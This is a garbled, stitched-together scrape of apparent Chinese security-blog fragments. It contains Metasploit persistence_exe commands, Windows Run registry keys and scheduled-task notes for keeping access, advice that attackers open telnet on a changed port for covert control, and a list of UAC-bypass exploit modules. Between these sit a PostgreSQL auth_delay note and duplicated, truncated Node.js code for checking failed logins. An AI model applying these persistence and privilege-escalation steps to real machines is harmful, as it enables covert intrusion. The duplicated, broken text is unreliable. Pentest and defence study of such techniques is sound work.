use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run
HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows命令行实现定时任务主要有schtasks与at二种方式:
at 适用于windows xp/2003,schtasks适用于win7/2008或者以后
每五分钟执行一次
at 适用于windows xp/2003,schtasks适用于win7/2008或者以后
每五分钟执行一次
telnet是命令行下的远程登录工具,不过在服务器管理时使用不多也常为管理员所忽视。攻击者如果在控制一台服务器后,开启“远程桌面”进行远程控制非常容易被管理员察觉,但是启动Telnet进行远程控制却不容易被察觉。不过,telnet的默认端口是23,如果开启后,别人是很容易扫描到的,因此攻击者会更改telnet的端口,从而独享该服务器的控制权。
在这里我们设置了auth_delay的设置后,密码输入错误后,至少等待5秒钟,这极大的摧毁了暴力破解中的给数据库系统尝试密码中暴力破解系统的压力。
const fs = require('fs');
const readline = require('readline');
const path = require('path');
// 日志文件目录这里修改你的日志文件的目录,同时日志必须是postgresql名开头的日志(拷贝文件时把这行中文去掉)
const logDirPath = '/pgdata/errorlog';
async function analyzeFailedLogins() {
const logFiles = fs.readdirSync(logDirPath).filter(file => file.startsWith('postgresql'));
for (const file of logFiles) {
console.log(
const fileStream = fs.createReadStream(path.join(logDirPath, file));
const rl = readline.createInterface({
input: fileStream,
crlfDelay: Infinity,
});
const readline = require('readline');
const path = require('path');
// 日志文件目录这里修改你的日志文件的目录,同时日志必须是postgresql名开头的日志(拷贝文件时把这行中文去掉)
const logDirPath = '/pgdata/errorlog';
async function analyzeFailedLogins() {
const logFiles = fs.readdirSync(logDirPath).filter(file => file.startsWith('postgresql'));
for (const file of logFiles) {
console.log(
正在分析文件: ${file});const fileStream = fs.createReadStream(path.join(logDirPath, file));
const rl = readline.createInterface({
input: fileStream,
crlfDelay: Infinity,
});
Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs